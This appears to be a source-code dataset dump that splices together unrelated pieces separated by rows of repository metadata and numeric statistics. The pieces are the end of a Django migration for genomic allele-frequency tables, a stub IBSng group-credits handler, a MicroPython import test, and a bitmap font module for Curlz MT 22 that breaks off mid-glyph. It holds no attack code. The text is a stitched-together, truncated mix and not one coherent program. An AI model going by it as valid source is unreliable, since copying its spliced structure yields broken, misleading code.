("an_amr", models.IntegerField(null=True)),
("an_eas", models.IntegerField(null=True)),
("an_fin", models.IntegerField(null=True)),
("an_nfe", models.IntegerField(null=True)),
("an_oth", models.IntegerField(null=True)),
("an_sas", models.IntegerField(null=True)),
("hemi", models.IntegerField(null=True)),
("hemi_afr", models.IntegerField(null=True)),
("hemi_amr", models.IntegerField(null=True)),
("hemi_eas", models.IntegerField(null=True)),
("hemi_fin", models.IntegerField(null=True)),
("hemi_nfe", models.IntegerField(null=True)),
("hemi_oth", models.IntegerField(null=True)),
("hemi_sas", models.IntegerField(null=True)),
("hom", models.IntegerField(null=True)),
("hom_afr", models.IntegerField(null=True)),
("hom_amr", models.IntegerField(null=True)),
("hom_eas", models.IntegerField(null=True)),
("hom_fin", models.IntegerField(null=True)),
("hom_nfe", models.IntegerField(null=True)),
("hom_oth", models.IntegerField(null=True)),
("hom_sas", models.IntegerField(null=True)),
("popmax", models.CharField(max_length=8, null=True)),
("ac_popmax", models.IntegerField(null=True)),
("an_popmax", models.IntegerField(null=True)),
("af_popmax", models.FloatField(null=True)),
("hemi_popmax", models.IntegerField(null=True)),
("hom_popmax", models.IntegerField(null=True)),
("af", models.FloatField(null=True)),
("af_afr", models.FloatField(null=True)),
("af_amr", models.FloatField(null=True)),
("af_eas", models.FloatField(null=True)),
("af_fin", models.FloatField(null=True)),
("af_nfe", models.FloatField(null=True)),
("af_oth", models.FloatField(null=True)),
("af_sas", models.FloatField(null=True)),
],
),
migrations.CreateModel(
name="GnomadExomes",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
("release", models.CharField(max_length=32)),
("chromosome", models.CharField(max_length=32)),
("position", models.IntegerField()),
("reference", models.CharField(max_length=512)),
("alternative", models.CharField(max_length=512)),
("ac", models.IntegerField(null=True)),
("ac_afr", models.IntegerField(null=True)),
("ac_amr", models.IntegerField(null=True)),
("ac_asj", models.IntegerField(null=True)),
("ac_eas", models.IntegerField(null=True)),
("ac_fin", models.IntegerField(null=True)),
("ac_nfe", models.IntegerField(null=True)),
("ac_oth", models.IntegerField(null=True)),
("ac_sas", models.IntegerField(null=True)),
("an", models.IntegerField(null=True)),
("an_afr", models.IntegerField(null=True)),
("an_amr", models.IntegerField(null=True)),
("an_asj", models.IntegerField(null=True)),
("an_eas", models.IntegerField(null=True)),
("an_fin", models.IntegerField(null=True)),
("an_nfe", models.IntegerField(null=True)),
("an_oth", models.IntegerField(null=True)),
("an_sas", models.IntegerField(null=True)),
("hemi", models.IntegerField(null=True)),
("hemi_afr", models.IntegerField(null=True)),
("hemi_amr", models.IntegerField(null=True)),
("hemi_asj", models.IntegerField(null=True)),
("hemi_eas", models.IntegerField(null=True)),
("hemi_fin", models.IntegerField(null=True)),
("hemi_nfe", models.IntegerField(null=True)),
("hemi_oth", models.IntegerField(null=True)),
("hemi_sas", models.IntegerField(null=True)),
("hom", models.IntegerField(null=True)),
("hom_afr", models.IntegerField(null=True)),
("hom_amr", models.IntegerField(null=True)),
("hom_asj", models.IntegerField(null=True)),
("hom_eas", models.IntegerField(null=True)),
("hom_fin", models.IntegerField(null=True)),
("hom_nfe", models.IntegerField(null=True)),
("hom_oth", models.IntegerField(null=True)),
("hom_sas", models.IntegerField(null=True)),
("popmax", models.CharField(max_length=8, null=True)),
("ac_popmax", models.IntegerField(null=True)),
("an_popmax", models.IntegerField(null=True)),
("af_popmax", models.FloatField(null=True)),
("hemi_popmax", models.IntegerField(null=True)),
("hom_popmax", models.IntegerField(null=True)),
("af", models.FloatField(null=True)),
("af_afr", models.FloatField(null=True)),
("af_amr", models.FloatField(null=True)),
("af_asj", models.FloatField(null=True)),
("af_eas", models.FloatField(null=True)),
("af_fin", models.FloatField(null=True)),
("af_nfe", models.FloatField(null=True)),
("af_oth", models.FloatField(null=True)),
("af_sas", models.FloatField(null=True)),
],
),
migrations.CreateModel(
name="GnomadGenomes",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
("release", models.CharField(max_length=32)),
("chromosome", models.CharField(max_length=32)),
("position", models.IntegerField()),
("reference", models.CharField(max_length=512)),
("alternative", models.CharField(max_length=512)),
("ac", models.IntegerField(null=True)),
("ac_afr", models.IntegerField(null=True)),
("ac_amr", models.IntegerField(null=True)),
("ac_asj", models.IntegerField(null=True)),
("ac_eas", models.IntegerField(null=True)),
("ac_fin", models.IntegerField(null=True)),
("ac_nfe", models.IntegerField(null=True)),
("ac_oth", models.IntegerField(null=True)),
("an", models.IntegerField(null=True)),
("an_afr", models.IntegerField(null=True)),
("an_amr", models.IntegerField(null=True)),
("an_asj", models.IntegerField(null=True)),
("an_eas", models.IntegerField(null=True)),
("an_fin", models.IntegerField(null=True)),
("an_nfe", models.IntegerField(null=True)),
("an_oth", models.IntegerField(null=True)),
("hemi", models.IntegerField(null=True)),
("hemi_afr", models.IntegerField(null=True)),
("hemi_amr", models.IntegerField(null=True)),
("hemi_asj", models.IntegerField(null=True)),
("hemi_eas", models.IntegerField(null=True)),
("hemi_fin", models.IntegerField(null=True)),
("hemi_nfe", models.IntegerField(null=True)),
("hemi_oth", models.IntegerField(null=True)),
("hom", models.IntegerField(null=True)),
("hom_afr", models.IntegerField(null=True)),
("hom_amr", models.IntegerField(null=True)),
("hom_asj", models.IntegerField(null=True)),
("hom_eas", models.IntegerField(null=True)),
("hom_fin", models.IntegerField(null=True)),
("hom_nfe", models.IntegerField(null=True)),
("hom_oth", models.IntegerField(null=True)),
("popmax", models.CharField(max_length=8, null=True)),
("ac_popmax", models.IntegerField(null=True)),
("an_popmax", models.IntegerField(null=True)),
("af_popmax", models.FloatField(null=True)),
("hemi_popmax", models.IntegerField(null=True)),
("hom_popmax", models.IntegerField(null=True)),
("af", models.FloatField(null=True)),
("af_afr", models.FloatField(null=True)),
("af_amr", models.FloatField(null=True)),
("af_asj", models.FloatField(null=True)),
("af_eas", models.FloatField(null=True)),
("af_fin", models.FloatField(null=True)),
("af_nfe", models.FloatField(null=True)),
("af_oth", models.FloatField(null=True)),
],
),
migrations.CreateModel(
name="ThousandGenomes",
fields=[
(
"id",
models.AutoField(
auto_created=True, primary_key=True, serialize=False, verbose_name="ID"
),
),
("release", models.CharField(max_length=32)),
("chromosome", models.CharField(max_length=32)),
("position", models.IntegerField()),
("reference", models.CharField(max_length=512)),
("alternative", models.CharField(max_length=512)),
("ac", models.IntegerField(null=True)),
("an", models.IntegerField(null=True)),
("het", models.IntegerField(null=True)),
("hom", models.IntegerField(null=True)),
("af", models.FloatField(null=True)),
("af_afr", models.FloatField(null=True)),
("af_amr", models.FloatField(null=True)),
("af_eas", models.FloatField(null=True)),
("af_eur", models.FloatField(null=True)),
("af_sas", models.FloatField(null=True)),
],
),
migrations.AddIndex(
model_name="thousandgenomes",
index=models.Index(
fields=["release", "chromosome", "position", "reference", "alternative"],
name="frequencies_release_e5bf46_idx",
),
),
migrations.AlterUniqueTogether(
name="thousandgenomes",
unique_together=set(
[("release", "chromosome", "position", "reference", "alternative")]
),
),
migrations.AddIndex(
model_name="gnomadgenomes",
index=models.Index(
fields=["release", "chromosome", "position", "reference", "alternative"],
name="frequencies_release_952459_idx",
),
),
migrations.AlterUniqueTogether(
name="gnomadgenomes",
unique_together=set(
[("release", "chromosome", "position", "reference", "alternative")]
),
),
migrations.AddIndex(
model_name="gnomadexomes",
index=models.Index(
fields=["release", "chromosome", "position", "reference", "alternative"],
name="frequencies_release_72be93_idx",
),
),
migrations.AlterUniqueTogether(
name="gnomadexomes",
unique_together=set(
[("release", "chromosome", "position", "reference", "alternative")]
),
),
migrations.AddIndex(
model_name="exac",
index=models.Index(
fields=["release", "chromosome", "position", "reference", "alternative"],
name="frequencies_release_668614_idx",
),
),
migrations.AlterUniqueTogether(
name="exac",
unique_together=set(
[("release", "chromosome", "position", "reference", "alternative")]
),
),
]
| 49.031579
| 95
| 0.51789
| 1,246
| 13,974
| 5.658909
| 0.069021
| 0.173592
| 0.361934
| 0.427741
| 0.925542
| 0.925542
| 0.925542
| 0.921997
| 0.913204
| 0.90512
| 0
| 0.008528
| 0.328682
| 13,974
| 284
| 96
| 49.204225
| 0.743098
| 0.004938
| 0
| 0.894928
| 1
| 0
| 0.127823
| 0.008632
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.007246
| 0
| 0.021739
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
2a1d19a16293385d54b964afb4723a793f75f1ed
| 162
|
py
|
Python
|
ibsng/handler/group/get_group_credits.py
|
ParspooyeshFanavar/pyibsng
|
d48bcf4f25e3f23461528bf0ff8870cc3d537444
|
[
"MIT"
] | 6
|
2018-03-06T10:16:36.000Z
|
2021-12-05T12:43:10.000Z
|
ibsng/handler/group/get_group_credits.py
|
ParspooyeshFanavar/pyibsng
|
d48bcf4f25e3f23461528bf0ff8870cc3d537444
|
[
"MIT"
] | 3
|
2018-03-06T10:27:08.000Z
|
2022-01-02T15:21:27.000Z
|
ibsng/handler/group/get_group_credits.py
|
ParspooyeshFanavar/pyibsng
|
d48bcf4f25e3f23461528bf0ff8870cc3d537444
|
[
"MIT"
] | 3
|
2018-01-06T16:28:31.000Z
|
2018-09-17T19:47:19.000Z
|
"""Get group credit API method."""
from ibsng.handler.handler import Handler
class getGroupCredits(Handler):
"""Get group credit method class."""
pass
| 18
| 41
| 0.709877
| 20
| 162
| 5.75
| 0.6
| 0.13913
| 0.243478
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.17284
| 162
| 8
| 42
| 20.25
| 0.858209
| 0.364198
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
aa74bb45f08b3ff9b283344c7f00d56b0ccf9f37
| 125
|
py
|
Python
|
tests/import/import_pkg5.py
|
learnforpractice/micropython-cpp
|
004bc8382f74899e7b876cc29bfa6a9cc976ba10
|
[
"MIT"
] | 13,648
|
2015-01-01T01:34:51.000Z
|
2022-03-31T16:19:53.000Z
|
tests/import/import_pkg5.py
|
learnforpractice/micropython-cpp
|
004bc8382f74899e7b876cc29bfa6a9cc976ba10
|
[
"MIT"
] | 7,092
|
2015-01-01T07:59:11.000Z
|
2022-03-31T23:52:18.000Z
|
tests/import/import_pkg5.py
|
learnforpractice/micropython-cpp
|
004bc8382f74899e7b876cc29bfa6a9cc976ba10
|
[
"MIT"
] | 4,942
|
2015-01-02T11:48:50.000Z
|
2022-03-31T19:57:10.000Z
|
# This tests relative imports as used in pkg3
import pkg3
import pkg3.mod1
import pkg3.subpkg1.mod1
pkg3.subpkg1.mod1.foo()
| 17.857143
| 45
| 0.792
| 21
| 125
| 4.714286
| 0.571429
| 0.30303
| 0.282828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092593
| 0.136
| 125
| 6
| 46
| 20.833333
| 0.824074
| 0.344
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
2ab824634cd145a03cc75a0c4e9bbe8d1bd7f34c
| 77,990
|
py
|
Python
|
gaugette/fonts/curlz_22.py
|
wsiffer/Google-Bartender
|
37018d3efe33a84074a6dccbce9e82f20ef3c923
|
[
"MIT"
] | 6
|
2020-07-30T00:21:29.000Z
|
2022-03-16T23:31:09.000Z
|
gaugette/fonts/curlz_22.py
|
antndeb/Google-Bartender
|
37018d3efe33a84074a6dccbce9e82f20ef3c923
|
[
"MIT"
] | null | null | null |
gaugette/fonts/curlz_22.py
|
antndeb/Google-Bartender
|
37018d3efe33a84074a6dccbce9e82f20ef3c923
|
[
"MIT"
] | 1
|
2022-03-16T23:39:29.000Z
|
2022-03-16T23:39:29.000Z
|
# coding=utf-8
# Module curlz_mt_22
# generated from Curlz MT 15.75pt
name = "Curlz MT 22"
start_char = '!'
end_char = chr(127)
char_height = 22
space_width = 11
gap_width = 2
bitmaps = (
# @0 '!' (3 pixels wide)
0x00, #
0x00, #
0x60, # OO
0x60, # OO
0x60, # OO
0x60, # OO
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x40, # O
0x00, #
0xE0, # OOO
0xA0, # O O
0x20, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @22 '"' (3 pixels wide)
0x00, #
0x00, #
0xA0, # O O
0xA0, # O O
0xA0, # O O
0xA0, # O O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @44 '#' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x04, 0x00, # O
0x24, 0x00, # O O
0x24, 0x00, # O O
0xFF, 0x80, # OOOOOOOOO
0x24, 0x00, # O O
0x24, 0x00, # O O
0xFF, 0x00, # OOOOOOOO
0x24, 0x00, # O O
0x44, 0x00, # O O
0x40, 0x00, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @88 '$' (6 pixels wide)
0x10, # O
0x10, # O
0x10, # O
0x78, # OOOO
0xDC, # OO OOO
0x9C, # O OOO
0x80, # O
0x80, # O
0x40, # O
0x20, # O
0x10, # O
0x68, # OO O
0xA8, # O O O
0x88, # O O
0x70, # OOO
0x20, # O
0x20, # O
0x20, # O
0x00, #
0x00, #
0x00, #
0x00, #
# @110 '%' (10 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x40, # O
0x00, 0x80, # O
0x51, 0x80, # O O OO
0xB9, 0x00, # O OOO O
0xBA, 0x00, # O OOO O
0x8C, 0x00, # O OO
0x74, 0x00, # OOO O
0x08, 0x00, # O
0x10, 0x00, # O
0x17, 0x00, # O OOO
0x2F, 0x80, # O OOOOO
0x2A, 0x80, # O O O O
0x48, 0x80, # O O O
0x87, 0x00, # O OOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @154 '&' (13 pixels wide)
0x00, 0x00, #
0x1C, 0x00, # OOO
0x22, 0x00, # O O
0x4A, 0x00, # O O O
0x4C, 0x00, # O OO
0x40, 0x00, # O
0x20, 0x00, # O
0x18, 0x00, # OO
0x0E, 0x38, # OOO OOO
0x33, 0xC0, # OO OOOO
0x44, 0x80, # O O O
0x8A, 0x40, # O O O O
0x8E, 0x40, # O OOO O
0xC0, 0x40, # OO O
0x60, 0x80, # OO O
0x1F, 0x00, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @198 ''' (1 pixels wide)
0x00, #
0x00, #
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @220 '(' (4 pixels wide)
0x00, #
0x10, # O
0x20, # O
0x20, # O
0x40, # O
0x40, # O
0x40, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x80, # O
0x40, # O
0x40, # O
0x20, # O
0x20, # O
0x10, # O
0x00, #
0x00, #
0x00, #
# @242 ')' (4 pixels wide)
0x00, #
0x80, # O
0x40, # O
0x40, # O
0x20, # O
0x20, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x10, # O
0x20, # O
0x20, # O
0x20, # O
0x40, # O
0x40, # O
0x80, # O
0x00, #
0x00, #
0x00, #
# @264 '*' (7 pixels wide)
0x00, #
0x00, #
0x08, # O
0x48, # O O
0x2E, # O OOO
0x38, # OOO
0xD8, # OO OO
0x14, # O O
0x12, # O O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @286 '+' (11 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0xFF, 0xE0, # OOOOOOOOOOO
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @330 ',' (2 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0xC0, # OO
0xC0, # OO
0x40, # O
0x80, # O
0x00, #
0x00, #
0x00, #
0x00, #
# @352 '-' (5 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0xF8, # OOOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @374 '.' (1 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @396 '/' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x80, # O
0x01, 0x00, # O
0x01, 0x00, # O
0x02, 0x00, # O
0x02, 0x00, # O
0x04, 0x00, # O
0x04, 0x00, # O
0x08, 0x00, # O
0x08, 0x00, # O
0x10, 0x00, # O
0x10, 0x00, # O
0x20, 0x00, # O
0x20, 0x00, # O
0x40, 0x00, # O
0x40, 0x00, # O
0x80, 0x00, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @440 '0' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x08, 0x00, # O
0x1E, 0x00, # OOOO
0x35, 0x00, # OO O O
0x75, 0x00, # OOO O O
0x58, 0x80, # O OO O
0xC0, 0x80, # OO O
0xC0, 0x80, # OO O
0xC0, 0x80, # OO O
0xC0, 0x80, # OO O
0xC0, 0x80, # OO O
0x41, 0x00, # O O
0x61, 0x00, # OO O
0x32, 0x00, # OO O
0x1C, 0x00, # OOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @484 '1' (8 pixels wide)
0x00, #
0x00, #
0xCC, # OO OO
0xF4, # OOOO O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x04, # O
0x0F, # OOOO
0x30, # OO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @506 '2' (8 pixels wide)
0x00, #
0x00, #
0x1C, # OOO
0x24, # O O
0x72, # OOO O
0x72, # OOO O
0x22, # O O
0x04, # O
0x04, # O
0x08, # O
0x10, # O
0x20, # O
0x46, # O OO
0x87, # O OOO
0xF1, # OOOO O
0x8E, # O OOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @528 '3' (7 pixels wide)
0x00, #
0x00, #
0x78, # OOOO
0xCC, # OO OO
0xB6, # O OO OO
0x76, # OOO OO
0x06, # OO
0x0C, # OO
0x18, # OO
0x70, # OOO
0x0C, # OO
0x06, # OO
0x66, # OO OO
0xA6, # O O OO
0x8C, # O OO
0x78, # OOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @550 '4' (10 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x79, 0x00, # OOOO O
0x85, 0x00, # O O O
0xA7, 0x00, # O O OOO
0xE6, 0x00, # OOO OO
0x0A, 0x00, # O O
0x12, 0x00, # O O
0x22, 0x00, # O O
0x42, 0x00, # O O
0xFF, 0xC0, # OOOOOOOOOO
0x02, 0x00, # O
0x02, 0x00, # O
0x02, 0x00, # O
0x02, 0x00, # O
0x1F, 0x80, # OOOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @594 '5' (9 pixels wide)
0x00, 0x00, #
0x07, 0x00, # OOO
0x01, 0x00, # O
0xFE, 0x00, # OOOOOOO
0x80, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0xFC, 0x00, # OOOOOO
0x07, 0x00, # OOO
0x03, 0x00, # OO
0x01, 0x80, # OO
0x71, 0x80, # OOO OO
0xB1, 0x80, # O OO OO
0x83, 0x00, # O OO
0xC6, 0x00, # OO OO
0x3C, 0x00, # OOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @638 '6' (9 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x07, 0x00, # OOO
0x18, 0x80, # OO O
0x20, 0x80, # O O
0x21, 0x80, # O OO
0x40, 0x00, # O
0x40, 0x00, # O
0xDE, 0x00, # OO OOOO
0xE3, 0x00, # OOO OO
0xE9, 0x80, # OOO O OO
0xF1, 0x80, # OOOO OO
0x61, 0x80, # OO OO
0x61, 0x00, # OO O
0x32, 0x00, # OO O
0x1C, 0x00, # OOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @682 '7' (7 pixels wide)
0x00, #
0x00, #
0xE0, # OOO
0xFE, # OOOOOOO
0x82, # O O
0x84, # O O
0x08, # O
0x08, # O
0x10, # O
0x10, # O
0x20, # O
0x20, # O
0x58, # O OO
0x58, # O OO
0x48, # O O
0x30, # OO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @704 '8' (7 pixels wide)
0x00, #
0x00, #
0x3C, # OOOO
0x42, # O O
0x9A, # O OO O
0x92, # O O O
0x8C, # O OO
0x48, # O O
0x30, # OO
0x30, # OO
0x2C, # O OO
0x42, # O O
0x42, # O O
0x42, # O O
0x42, # O O
0x3C, # OOOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @726 '9' (8 pixels wide)
0x00, #
0x00, #
0x38, # OOO
0x64, # OO O
0x46, # O OO
0xC3, # OO OO
0xC3, # OO OO
0xDB, # OO OO OO
0xDB, # OO OO OO
0x7B, # OOOO OO
0x33, # OO OO
0x02, # O
0x06, # OO
0x46, # O OO
0x4C, # O OO
0x38, # OOO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @748 ':' (2 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0xC0, # OO
0xC0, # OO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0xC0, # OO
0xC0, # OO
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @770 ';' (2 pixels wide)
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x80, # O
0x80, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0xC0, # OO
0xC0, # OO
0x40, # O
0x80, # O
0x00, #
0x00, #
0x00, #
0x00, #
# @792 '<' (12 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x30, # OO
0x00, 0xE0, # OOO
0x03, 0x00, # OO
0x0C, 0x00, # OO
0x70, 0x00, # OOO
0x80, 0x00, # O
0x60, 0x00, # OO
0x18, 0x00, # OO
0x04, 0x00, # O
0x03, 0x00, # OO
0x00, 0xC0, # OO
0x00, 0x20, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @836 '=' (11 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0xFF, 0xE0, # OOOOOOOOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0xFF, 0xE0, # OOOOOOOOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @880 '>' (12 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0xC0, 0x00, # OO
0x30, 0x00, # OO
0x0C, 0x00, # OO
0x03, 0x00, # OO
0x00, 0xE0, # OOO
0x00, 0x10, # O
0x00, 0x60, # OO
0x01, 0x80, # OO
0x02, 0x00, # O
0x0C, 0x00, # OO
0x30, 0x00, # OO
0x40, 0x00, # O
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @924 '?' (7 pixels wide)
0x00, #
0x00, #
0x78, # OOOO
0xC4, # OO O
0xF2, # OOOO O
0xD2, # OO O O
0x62, # OO O
0x02, # O
0x04, # O
0x18, # OO
0x10, # O
0x10, # O
0x10, # O
0x00, #
0x10, # O
0x10, # O
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
0x00, #
# @946 '@' (10 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x1F, 0x00, # OOOOO
0x21, 0x80, # O OO
0x41, 0xC0, # O OOO
0x8F, 0x40, # O OOOO O
0x92, 0x40, # O O O O
0x96, 0x40, # O O OO O
0x8E, 0x80, # O OOO O
0x83, 0x00, # O OO
0x40, 0x00, # O
0x21, 0x00, # O O
0x1F, 0x00, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @990 'A' (14 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x00, 0xF0, # OOOO
0x01, 0x10, # O O
0x02, 0x20, # O O
0x06, 0x20, # OO O
0x24, 0x20, # O O O
0x24, 0x20, # O O O
0x14, 0x30, # O O OO
0x0F, 0xE0, # OOOOOOO
0x04, 0x20, # O O
0x04, 0x20, # O O
0x48, 0x20, # O O O
0xC8, 0x20, # OO O O
0x88, 0x14, # O O O O
0x70, 0x18, # OOO OO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1034 'B' (10 pixels wide)
0x08, 0x00, # O
0x08, 0x00, # O
0x3E, 0x00, # OOOOO
0xC9, 0x80, # OO O OO
0xA8, 0xC0, # O O O OO
0x68, 0x40, # OO O O
0x08, 0x40, # O O
0x08, 0x40, # O O
0x08, 0x80, # O O
0x0B, 0x00, # O OO
0x09, 0x80, # O OO
0x08, 0x80, # O O
0x08, 0x80, # O O
0x09, 0x00, # O O
0x3E, 0x00, # OOOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1078 'C' (10 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x0F, 0x80, # OOOOO
0x10, 0xC0, # O OO
0x27, 0x40, # O OOO O
0x45, 0x40, # O O O O
0x43, 0x80, # O OOO
0x80, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0x80, 0x00, # O
0xC0, 0x40, # OO O
0x40, 0x40, # O O
0x20, 0x40, # O O
0x30, 0x80, # OO O
0x0F, 0x00, # OOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1122 'D' (13 pixels wide)
0x00, 0x00, #
0x00, 0x00, #
0x10, 0x00, # O
0x1F, 0x80, # OOOOOO
0x78, 0x60, # OOOO OO
0xE8, 0x30, # OOO O OO
0xE8, 0x10, # OOO O O
0x08, 0x08, # O O
0x08, 0x08, # O O
0x0C, 0x08, # OO O
0x04, 0x08, # O O
0x04, 0x10, # O O
0x04, 0x10, # O O
0x04, 0x60, # O OO
0x05, 0x80, # O OO
0x1E, 0x00, # OOOO
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
0x00, 0x00, #
# @1166 'E' (9 pixels wide)
0x00, 0x00, #
